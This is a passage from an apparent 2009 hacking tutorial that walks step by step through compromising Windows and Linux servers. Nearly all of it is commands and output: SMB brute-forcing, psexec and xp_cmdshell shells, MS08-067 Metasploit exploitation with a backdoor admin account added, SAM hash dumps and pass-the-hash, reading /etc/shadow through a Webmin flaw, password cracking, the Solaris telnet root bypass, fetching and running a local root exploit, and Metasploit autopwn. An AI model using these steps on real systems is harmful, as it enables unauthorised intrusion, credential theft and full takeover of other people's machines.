    bt nmap-4.85BETA10 # nmap –script=smb-enum-shares 192.168.80.129

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
    Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
    set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
    Interesting ports on 192.168.80.129:
    Not shown: 990 closed ports
    PORT STATE SERVICE
    80/tcp open http
    135/tcp open msrpc
    139/tcp open netbios-ssn
    443/tcp open https
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1027/tcp open IIS
    1433/tcp open ms-sql-s
    3372/tcp open msdtc
    MAC Address: 00:0C:29:CC:CF:46 (VMware)

    Host script results:
    | smb-enum-shares:
    | Anonymous shares: IPC$
    |_ Restricted shares: COVERPG$, Fax$, Inetpub, scripts, ADMIN$, C$

    Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds

    [End Result]————————————————————————————

    From Result, We know all share files:
    IPC << Anonymous Null Session COVERPG Fax Inetpub scripts ADMIN C Next, We know all users from Null Session so we can bruteforce attack for their users with Nmap-script "smb-brute" [Nmap Result]----------------------------------------------------------------------------------- bt nmap-4.85BETA10 # nmap --script=smb-brute 192.168.80.129 Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:38 GMT Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons. set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too). Interesting ports on 192.168.80.129: Not shown: 990 closed ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1027/tcp open IIS 1433/tcp open ms-sql-s 3372/tcp open msdtc MAC Address: 00:0C:29:CC:CF:46 (VMware) Host script results: | smb-brute: | backup:pukcab => Login was successful
    |_ epp:password => Login was successful

    Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds

    [End Result]————————————————————————————

    Look at that result, We can brute weak password from users backup and epp.

    ++++++++++++++++++++++++++
    [0x01b] – Gaining Access
    ++++++++++++++++++++++++++

    Now we got 2 account credentials for attack, We choose “epp” that use password “password”. Use psexec (Pstool from sysinternals)
    to spawn command shell back to our.

    [Psexec Result]———————————————————————————
    C:\>psexec \\192.168.80.129 -u epp -p password -e cmd.exe

    PsExec v1.71 – Execute processes remotely
    Copyright (C) 2001-2006 Mark Russinovich
    Sysinternals – www.sysinternals.com

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>ipconfig

    Windows 2000 IP Configuration

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . : localdomain
    IP Address. . . . . . . . . . . . : 192.168.80.129
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.80.2

    C:\WINNT\system32>net user

    User accounts for \\SERVER

    ——————————————————————————
    Administrator backup epp
    epp_contractor Guest IUSR_SERVER
    IWAM_SERVER Jim John
    mary molly TsInternetUser
    The command completed successfully.

    [End Result]————————————————————————————

    From Result, We can spawn their command shell with epp’s privilege (Administrators) then Blah Blah Blah…

    The target use MSSQL 2000, we guess they use default username/password for MSSQL 2000 (SA/blank password).So we use osql to spawn command shell with MSSQL stored procedure
    xp_cmdshell, This stored procedure was gold mines for Hacker that use for interactive command shell. Attacker can use ‘osql’ to get shell from target.

    [Osql Result]———————————————————————————–
    C:\>osql -S 192.168.80.129 -U sa -P “” -Q “exec master..xp_cmdshell ‘dir c:\’ ”
    output

    ——————————————————————————

    ———————————————————————–

    ———————————————————————–

    ——————————–
    Volume in drive C has no label.

    Volume Serial Number is 50C0-6A72

    NULL

    Directory of c:\

    NULL

    12/03/2004 04:39p 451 dir.txt
    06/04/2004 03:49p

    Documents and Settings
    19/03/2009 12:47a Inetpub
    19/03/2009 12:38a Program Files
    03/07/2009 04:55p WINNT
    1 File(s) 451 bytes
    4 Dir(s) 3,053,559,808 bytes free

    NULL

    C:\>osql -S 192.168.80.129 -U sa -P “” -Q “exec master..xp_cmdshell ‘net user’ ”
    output

    ——————————————————————————

    ———————————————————————–

    ———————————————————————–

    ——————————–

    —————————————————————————–

    Administrator backup cwh

    epp epp_contractor Guest

    IUSR_SERVER IWAM_SERVER Jim

    John mary molly

    TsInternetUser

    or more errors.

    NULL

    NULL

    [End Result]————————————————————————————

    Note: Nmap-script have “ms-sql-info.nse” for scaning machine that use account ‘sa’ with blank password too.

    The Lastest Worm like Conficker/DownADup, Nmap-script can scan for MS08-067 Vulnerability ?? and System Infected Worm ?? with “smb-check-vulns”.

    [Nmap Result]———————————————————————————–

    bt nmap-4.85BETA10 # nmap –script=smb-check-vulns 192.168.80.129

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:35 GMT
    Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
    set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
    Interesting ports on 192.168.80.129:
    Not shown: 990 closed ports
    PORT STATE SERVICE
    80/tcp open http
    135/tcp open msrpc
    139/tcp open netbios-ssn
    443/tcp open https
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1027/tcp open IIS
    1433/tcp open ms-sql-s
    3372/tcp open msdtc
    MAC Address: 00:0C:29:CC:CF:46 (VMware)

    Host script results:
    | smb-check-vulns:
    | MS08-067: VULNERABLE
    |_ Conficker: Likely CLEAN

    Nmap done: 1 IP address (1 host up) scanned in 1.66 seconds

    [End Result]————————————————————————————

    Now we know target has MS08-067 vulnerability, Then use the G0d of Exploit suite => “Metasploit Framework”

    [Msf Console]———————————————————————————–

    msf > use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > show targets
    msf exploit(ms08_067_netapi) > set TARGET 1
    TARGET => 1
    msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_bind_tcp
    PAYLOAD => generic/shell_bind_tcp
    msf exploit(ms08_067_netapi) > set RHOST 192.168.80.129
    RHOST => 192.168.80.129
    msf exploit(ms08_067_netapi) > exploit

    [*] Started bind handler
    [*] Triggering the vulnerability…
    [*] Command shell session 1 opened (192.168.80.131:51038 -> 192.168.80.129:4444)

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>ipconfig
    ipconfig

    Windows 2000 IP Configuration

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . : localdomain
    IP Address. . . . . . . . . . . . : 192.168.80.129
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.80.2

    C:\WINNT\system32>net user cwh 1234 /add
    net user cwh 1234 /add
    The command completed successfully.

    C:\WINNT\system32>net localgroup administrators cwh /add
    net localgroup administrators cwh /add
    The command completed successfully.

    C:\WINNT\system32>net user
    net user

    User accounts for \\

    ——————————————————————————-
    Administrator backup cwh
    epp epp_contractor Guest
    IUSR_SERVER IWAM_SERVER Jim
    John mary molly
    TsInternetUser
    The command completed with one or more errors.

    [End Msf]—————————————————————————————

    The Most popular Tools for scanning, enumeration, vulnerability assessment is Nessus (www.www.nessus.org).That have many features like highspeed discovery.
    configuration audit, sensitive data discovery and vulnerability analysis. The Best thing, It’s FREE !!!

    ++++++++++++++++++++++++++++++++
    [0x01c] – Escalating Privilege
    ++++++++++++++++++++++++++++++++

    The next step to do is Dump SAM file from target that get all hashing. Sure we can use Nmap !!
    We can read the information in SAM file only when we have administrator’s privilege (epp’s account had administrators group)

    [Nmap Result]———————————————————————————–

    bt nmap-4.85BETA10 # nmap –script=smb-pwdump –script-args=smbuser=epp,smbpass=password 192.168.80.129

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:50 GMT
    Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
    set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
    Interesting ports on 192.168.80.129:
    Not shown: 990 closed ports
    PORT STATE SERVICE
    80/tcp open http
    135/tcp open msrpc
    139/tcp open netbios-ssn
    443/tcp open https
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1027/tcp open IIS
    1433/tcp open ms-sql-s
    3372/tcp open msdtc
    MAC Address: 00:0C:29:CC:CF:46 (VMware)

    Host script results:
    | smb-pwdump:
    | Administrator:1010 => F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
    | backup:1005 => E84F09BA27610849AAD3B435B51404EE:94FF50F81F9885648A05438F63EA9F91
    | epp:500 => E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
    | epp_contractor:1007 => 60F898DDDCAE534EAAD3B435B51404EE:148301D12E96ED2CE24A20C6ED9A2EAF
    | Guest:501 => A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
    | IUSR_SERVER:1001 => 0C2A09C60FF052D3518640B5D8EB223A:E9C4226B18D023A932473576E62EB5E9
    | IWAM_SERVER:1002 => A373B0BEBCEED1FAD95379C32DAD5DEF:803F59A7EA1EA9A65A15310B58A015D3
    | Jim:1009 => 209CA2D6E74286E9AAD3B435B51404EE:FF623167AECD14984A0A97E4D3989A89
    | John:1004 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
    | mary:1003 => 879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
    | molly:1008 => 4B69911850133174AAD3B435B51404EE:D5173C778E0F56D9FC47E3B3C829ACA7
    |_ TsInternetUser:1000 => 52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52

    Nmap done: 1 IP address (1 host up) scanned in 2.58 seconds

    [End Result]————————————————————————————

    Now we got all hash from target system. In the past, Need to crack password by using a tool such as cain or rcrack
    with a technique called “rainbow tables” but this action steal sleeping time from us. We can save that time by one of nmap features.
    Nmap can try to login to other machines with gathering hashes and list of usernames. We do not need to pre-crack the hashes.

    [Nmap Result]———————————————————————————–

    bt nmap-4.85BETA10 # cat password.txt
    F703F386322B0662E72C57EF50F76A05
    E52CAC67419A9A224A3B108F3FA6CB6D
    209CA2D6E74286E9AAD3B435B51404EE
    bt nmap-4.85BETA10 # nmap –script=smb-brute –script-args=userdb=usernames.txt,passdb=password.txt 192.168.80.1/24

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:50 GMT
    Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons.
    set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
    Interesting ports on 192.168.80.100:
    PORT STATE SERVICE
    445/tcp open microsoft-ds

    Host script results:
    | smb-brute:
    |_ Administrator:F703F386322B0662E72C57EF50F76A05 => Login was successful

    Interesting ports on 192.168.80.135:
    PORT STATE SERVICE
    445/tcp open microsoft-ds

    Host script results:
    | smb-brute:
    | epp:E52CAC67419A9A224A3B108F3FA6CB6D => Login was successful
    |_ Jim:209CA2D6E74286E9AAD3B435B51404EE => Login was successful

    [End Result]————————————————————————————

    Now we can compromise other system from network that use the same password (Hashing with no-crack), Use Passing the Hash with SMB suite (http://foofus.net/jmk/passhash.html)
    to impersonating user without password. I use samba-3.0.22 with patched:

    ./configure –with-smbmount
    patch -p0 whosthere
    WHOSTHERE v1.4 – by Hernan Ochoa ([email protected], [email protected]) – (c) 2007-2008 Core Security Technologies
    This tool lists the active LSA logon sessions with NTLM credentials.
    (use -h for help).
    -B is now used by default. Trying to find correct addresses..Found!.
    the output format is: username:domain:lmhash:nthash

    cwh:SERVER:00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
    Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67

    C:\pshtoolkit_v1.4\whosthere>cd ..\iam
    C:\pshtoolkit_v1.4\iam>iam.exe -r cmd.exe -h Administrator:SERVER2:209CA2D6E74286E9AAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67 -B
    IAM v1.4 – by Hernan Ochoa ([email protected], [email protected]) – (c) 2007-2008 Core Security Technologies
    Parameters:
    Username: Administrator
    Domainname: SERVER2
    LM hash: 209CA2D6E74286E9AAD3B435B51404EE
    NT hash: BA69764BCCF8F41121E0B3046CE46C67
    Run: cmd.exe
    LSASRV.DLL version: 00050001h. A280DC0h
    Checking LSASRV.DLL….skipped. (-B was specified).
    Trying to obtain addresses…Ok! (AC = 75753BA0, EM = 7573FDEC)
    The current logon credentials were successful changed!

    [End Result]————————————————————————————

    Now we have Administrator credential in the new MS-dos that Maybe can compromise many machine in network !!

    #######################################
    [0x02] – The Art of Unix/Linux Attack
    #######################################

    ++++++++++++++++++++++++++++++++++
    [0x02a] – Scanning & Enumeration
    ++++++++++++++++++++++++++++++++++

    The first thing important before start hacking is gathering as much information as you can.
    You can use the information to guess password, specific points to attack or anything as
    you can imagine. Our favourite tool used to scan a target is nmap. We know openning ports and
    a software version with only one command. We show you below 😀

    [Nmap Result]———————————————————————————–

    bt cwh # nmap -sV www.target.com

    Starting Nmap 4.76 ( http://nmap.org ) at 2009-07-03 16:38 SE Asia Standard Time

    Interesting ports on 192.168.0.111:
    Not shown: 987 closed ports
    PORT STATE SERVICE VERSION
    21/tcp open ftp vsftpd 2.0.6
    22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
    25/tcp open smtp Cisco PIX sanitized smtpd
    53/tcp open domain ISC BIND 9.4.2
    80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
    111/tcp filtered rpcbind
    443/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
    554/tcp filtered rtsp
    1720/tcp filtered H.323/Q.931
    2000/tcp filtered callbook
    3306/tcp open mysql MySQL (unauthorized)
    5060/tcp filtered sip
    10000/tcp open http Webmin httpd
    Service Info: OSs: Unix, Linux; Device: firewall

    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds

    [End Result]————————————————————————————

    In the result, you see that this system use Webmin but we do not know the exact version.
    If we are not an Alzheimer, Webmin used to expose file disclosure vulnerability in version 1.290.
    We try to search in milw0rm.com and , bingo!!, We find one at http://milw0rm.com/exploits/2017 .
    It is perl script exploit. So, we download the script and save as 2017.pl then we launch the command …

    [Perl Script Result]—————————————————————————-

    bt cwh # perl 2017.pl www.target.com 10000 http /etc/passwd
    root:x:0:0::/root:/bin/bash
    bin:x:1:1:bin:/bin:/bin/false
    daemon:x:2:2:daemon:/sbin:/bin/false
    adm:x:3:4:adm:/var/log:/bin/false
    lp:x:4:7:lp:/var/spool/lpd:/bin/false
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/:/bin/false
    news:x:9:13:news:/usr/lib/news:/bin/false
    uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
    operator:x:11:0:operator:/root:/bin/bash
    games:x:12:100:games:/usr/games:/bin/false
    ftp:x:14:50::/home/ftp:/bin/false
    smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
    mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
    rpc:x:32:32:RPC portmap user:/:/bin/false
    sshd:x:33:33:sshd:/:/bin/false
    gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
    apache:x:80:80:User for Apache:/srv/httpd:/bin/false
    messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
    haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
    pop:x:90:90:POP:/:/bin/false
    nobody:x:99:99:nobody:/:/bin/false
    snort:x:1000:102::/home/snort:/bin/false
    user1:x:1001:100::/home/user1:

    [End Perl Script Result]————————————————————————

    lol !!! It seems that an admin is an outdated. She do not update or patch her Webmin.

    ++++++++++++++++++++++++++
    [0x02b] – Gaining Access
    ++++++++++++++++++++++++++

    As the target is linux server, it is harder than windows server to remotely attack.
    The most remote exploits affected on linux are from third party software such as
    ftp, ssh, web server. The ways to access linux server are to exploit third party
    running services, to get user information from web application vulnerability then
    do the brute forcing and to do social engineer toward valid user.

    In our example case, we highly recommend you to try following command:

    bt cwh # perl 2017.pl www.target.com 10000 http /etc/shadow

    This command tries to read /etc/shadow file. If a result seem like below, you are lucky ;D

    [Perl Script Result]—————————————————————————-

    root:$1$MKy0eqPM$auerQwMpGYcqgBqDddkfO/:13666:0:::::
    bin:*:9797:0:::::
    daemon:*:9797:0:::::
    adm:*:9797:0:::::
    lp:*:9797:0:::::
    sync:*:9797:0:::::
    shutdown:*:9797:0:::::
    halt:*:9797:0:::::
    mail:*:9797:0:::::
    news:*:9797:0:::::
    uucp:*:9797:0:::::
    operator:*:9797:0:::::
    games:*:9797:0:::::
    ftp:*:9797:0:::::
    smmsp:*:9797:0:::::
    mysql:*:9797:0:::::
    rpc:*:9797:0:::::
    sshd:*:9797:0:::::
    gdm:*:9797:0:::::
    pop:*:9797:0:::::
    apache:*:9797:0:::::
    messagebus:*:9797:0:::::
    haldaemon:*:9797:0:::::
    nobody:*:9797:0:::::
    snort:!:13986:0:99999:7:::
    user1:$1$RY88JSH8$1A73wdGEerLFulLzzTnHX0:14428:0:99999:7:::

    [End Perl Script Result]————————————————————————

    We put the result in file shadow.txt and then try to crack passwords by using John the Ripper.
    (dict.lst is dictionary file)

    [John Result]———————————————————————————–

    bt cwh # john –wordlist=dict.lst shadow.txt
    Loaded 2 password hashes with 2 different salts (FreeBSD MD5 [32/32])
    user1 (user1)
    guesses: 1 time: 0:00:00:00 100% c/s: 150 trying: abc

    [End John Result]——————————————————————————-

    It means that password of user1 is “user1” and cannot find password for root.
    Now, you can login to the target system by using credential information of user1.

    After you can find the way into the system, you have to figure the way to escalate
    your privilege.

    We have another example to show you. It is telnet vulnerability on solaris 10/11.
    This vulnerability allows you to login easily with root privilege. We just send
    [telnet –l “-froot” 192.168.0.112] to telnet deamon on solaris 10/11.

    [Telnet bypass]———————————————————————————

    bt cwh # telnet –l “-froot” 192.168.0.112
    Trying 192.168.0.112…
    Connected to 192.168.0.112.
    Escape character is ‘^]’.
    Last login: Sun Jun 30 02:02:02 from 192.168.0.2
    Sun Microsystems Inc. SunOS 5.10 Generic January 2007
    # id
    uid=0(root) gid=0(root)
    #

    [End Result]————————————————————————————

    If we use this technique, we do not want to escalate privilege cause we already login
    as root privilege.

    ++++++++++++++++++++++++++++++++
    [0x02c] – Escalating Privilege
    ++++++++++++++++++++++++++++++++

    In this article, we introduce you to use local root exploit for linux. You can find
    the exploits from milw0rm.com. the first tasks after access the system are to check
    linux kernel version and the user id.

    [email protected]:~$ uname -a
    Linux linuxserver 2.6.17-10-server #2 SMP Fri Oct 13 18:47:26 UTC 2006 i686 GNU/Linux
    [email protected]:~$ id
    uid=1001(user1) gid=1001(user1) groups=1001(user1)

    As the result of two commands above, we want to escalate our privilege to be root and
    we remember that there is an local root exploit for linux 2.6.17 – 2.6.24 on milw0rm.com ;D
    we do not hesitate to download the code, compile it and run. The result is shown below …

    [email protected]:~$ wget http://milw0rm.com/exploits/5092
    –17:17:21– http://milw0rm.com/exploits/5092
    => `5092′
    Resolving milw0rm.com… 76.74.9.18
    Connecting to milw0rm.com|76.74.9.18|:80… connected.
    HTTP request sent, awaiting response… 200 OK
    Length: unspecified [text/html]

    [ <=> ] 7,197 11.58K/s

    17:17:23 (11.58 KB/s) – `5092′ saved [7197]

    [email protected]:~$ gcc -o 5092 5092.c
    5092.c:289:28: warning: no newline at end of file
    [email protected]:~$ ./5092
    ———————————–
    Linux vmsplice Local Root Exploit
    By qaaz
    ———————————–
    [+] mmap: 0x0 .. 0x1000
    [+] page: 0x0
    [+] page: 0x20
    [+] mmap: 0x4000 .. 0x5000
    [+] page: 0x4000
    [+] page: 0x4020
    [+] mmap: 0x1000 .. 0x2000
    [+] page: 0x1000
    [+] mmap: 0xb7e79000 .. 0xb7eab000
    [+] root
    [email protected]:~# id
    uid=0(root) gid=0(root) groups=1001(root)

    Finally, we are a root of target server. We can do whatever we want. XD

    #####################################
    [0x03] – Metasploit Ninja-Autopwned
    #####################################

    Metasploit is a tool for exploiting system vulnerabilities but penetration tester need to find those vulnerabilities first,
    this is a drawback of metasploit. However, the lastest version of metasploit is added a feature called “Autopwned” which automatically
    exploit vulnerabilities reported from nmap or nessus.
    Note: Metasploit have one features called “Autopwn Metasploit Automated”. That can scanning all network by nmap and Automating exploit.

    +++++++++++++++++++++++++++++++++++++
    [0x03a] – Nmap+Metasploit Autopwned
    +++++++++++++++++++++++++++++++++++++

    [Nmap Result]———————————————————————————–

    bt ~ # nmap -sS 192.168.80.129 -oX nmap.xml

    Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 12:04 GMT
    Interesting ports on 192.168.80.129:
    Not shown: 990 closed ports
    PORT STATE SERVICE
    80/tcp open http
    135/tcp open msrpc
    139/tcp open netbios-ssn
    443/tcp open https
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1027/tcp open IIS
    1433/tcp open ms-sql-s
    3372/tcp open msdtc
    MAC Address: 00:0C:29:CC:CF:46 (VMware)

    Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

    [End Result]————————————————————————————

    Now we got nmap.xml for import to Metasploit framework…

    [Import Nmap result to Metasploit]————————————————————–

    bt framework3 # msfconsole
    _ _ _ _
    | | | | (_) |
    _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
    | ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __|
    | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
    |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
    | |
    |_|

    =[ msf v3.3-dev
    + — –=[ 288 exploits – 124 payloads
    + — –=[ 17 encoders – 6 nops
    =[ 56 aux

    msf > load db_sqlite3
    [*] Successfully loaded plugin: db_sqlite3
    msf > db_create /tmp/test.db
    [*] Creating a new database instance…
    [*] Successfully connected to the database
    [*] File: /tmp/test.db
    msf > db_import_nmap_xml /root/nmap.xml
    msf > db_hosts
    [*] Time: Fri Jul 03 14:01:56 +0000 2009 Host: 192.168.80.129 Status: alive OS:
    msf > db_autopwn -p -e
    [*] (3/116): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.80.129:80…
    [*] (8/116): Launching exploit/unix/webapp/awstats_configdir_exec against 192.168.80.129:80…
    [*] (9/116): Launching exploit/windows/http/bea_weblogic_transfer_encoding against 192.168.80.129:80…

    [*] Started bind handler
    [*] Started bind handler
    [*] (12/116): Launching exploit/unix/webapp/awstats_migrate_exec against 192.168.80.129:80…
    [*] (13/116): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135…
    [*] Started bind handler
    [*] Started bind handler
    [*] Job limit reached, waiting on modules to finish…
    [*] The server returned: 404 Object Not Found
    [*] This server may not be vulnerable
    [*] Started bind handler
    [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal…
    [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] …
    [*] The server returned: 404 Object Not Found
    [*] This server may not be vulnerable
    [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] …
    [*] Sending exploit …
    [*] The DCERPC service did not reply to our request
    [*] Command shell session 1 opened (192.168.80.131:52929 -> 192.168.80.129:10529)
    …….
    …….
    sessions -l

    Active sessions
    ===============

    Id Description Tunnel
    — ———– ——
    1 Command shell 192.168.80.131:52929 -> 192.168.80.129:10529
    2 Command shell 192.168.80.131:50775 -> 192.168.80.129:17887
    3 Command shell 192.168.80.131:40985 -> 192.168.80.129:37295
    4 Command shell 192.168.80.131:51652 -> 192.168.80.129:37095
    5 Command shell 192.168.80.131:38373 -> 192.168.80.129:17130
    6 Command shell 192.168.80.131:56722 -> 192.168.80.129:20693

    msf >sessions -i 1
    [*] Starting interaction with 1…

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>ipconfig
    ipconfig

    Windows 2000 IP Configuration

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . : localdomain
    IP Address. . . . . . . . . . . . : 192.168.80.129
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.80.2

    C:\WINNT\system32>

    [End Result]————————————————————————————

    +++++++++++++++++++++++++++++++++++++++
    [0x03b] – Nessus+Metasploit Autopwned
    +++++++++++++++++++++++++++++++++++++++

    First, you must use Nessus scanner for VA and export file with *.nbe, then import to metasploit framework for autopwn

    [Import Nessus(nbe) result to Metasploit]——————————————————-

    bt framework3 # msfconsole

    # # ###### ##### ## #### ##### # #### # #####
    ## ## # # # # # # # # # # # #
    # ## # ##### # # # #### # # # # # # #
    # # # # ###### # ##### # # # # #
    # # # # # # # # # # # # # #
    # # ###### # # # #### # ###### #### # #

    =[ msf v3.3-dev
    + — –=[ 288 exploits – 124 payloads
    + — –=[ 17 encoders – 6 nops
    =[ 56 aux

    msf > load db_sqlite3
    [*] Successfully loaded plugin: db_sqlite3
    msf > db_create /tmp/ness.db
    [*] Creating a new database instance…
    [*] Successfully connected to the database
    [*] File: /tmp/ness.db
    msf > db_import_nessus_nbe /root/demo.nbe
    msf > db_hosts
    [*] Time: Fri Jul 03 14:43:58 +0000 2009 Host: 192.168.80.129 Status: alive OS:
    msf > db_autopwn -x -t
    [*] Analysis completed in 4.28915095329285 seconds (17 vulns / 1145 refs)
    [*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.80.129:445…
    [*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135…
    [*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445…
    [*] Matched exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434…
    [*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445…
    [*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445…
    msf > db_autopwn -x -e
    [*] (2/6): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135…
    [*] (3/6): Launching exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445…

    [*] Started bind handler
    [*] (4/6): Launching exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434…
    [*] Started bind handler
    [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal…
    [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] …
    [*] (5/6): Launching exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445…
    [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] …
    [*] Started bind handler
    [*] (6/6): Launching exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445…
    [*] Sending UDP packet with return address 0x42b48774
    [*] Execute ‘net start sqlserveragent’ once access is obtained
    [*] Started bind handler
    [*] Connecting to the SMB service…
    [*] Sending exploit …
    msf >
    [*] Detected a Windows 2000 target
    [*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[email protected]_np:192.168.80.129[\BROWSER] …
    [*] Started bind handler
    [*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:[email protected]_np:192.168.80.129[\browser] …
    [*] The DCERPC service did not reply to our request
    [*] Command shell session 1 opened (192.168.80.131:41655 -> 192.168.80.129:39354)
    [*] Command shell session 2 opened (192.168.80.131:57118 -> 192.168.80.129:7605)
    [*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.80.129[\lsarpc]…
    [*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[email protected]_np:192.168.80.129[\BROWSER] …
    [*] Building the stub data…
    [*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:[email protected]_np:192.168.80.129[\browser] …
    [*] Calling the vulnerable function…
    [*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.80.129[\lsarpc]…
    [*] Getting OS information…
    [*] Trying to exploit Windows 5.0
    [*] Calling the vulnerable function…
    [+] Server did not respond, this is expected
    [*] Command shell session 3 opened (192.168.80.131:50407 -> 192.168.80.129:15299)
    [*] Command shell session 4 opened (192.168.80.131:32768 -> 192.168.80.129:30092)
    [*] The DCERPC service did not reply to our request
    [*] Command shell session 5 opened (192.168.80.131:39556 -> 192.168.80.129:17330)
    sessions -l

    Active sessions
    ===============

    Id Description Tunnel
    — ———– ——
    1 Command shell 192.168.80.131:41655 -> 192.168.80.129:39354
    2 Command shell 192.168.80.131:57118 -> 192.168.80.129:7605
    3 Command shell 192.168.80.131:50407 -> 192.168.80.129:15299
    4 Command shell 192.168.80.131:32768 -> 192.168.80.129:30092
    5 Command shell 192.168.80.131:39556 -> 192.168.80.129:17330

    msf > sessions -i 3
    [*] Starting interaction with 3…

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>ipconfig
    ipconfig

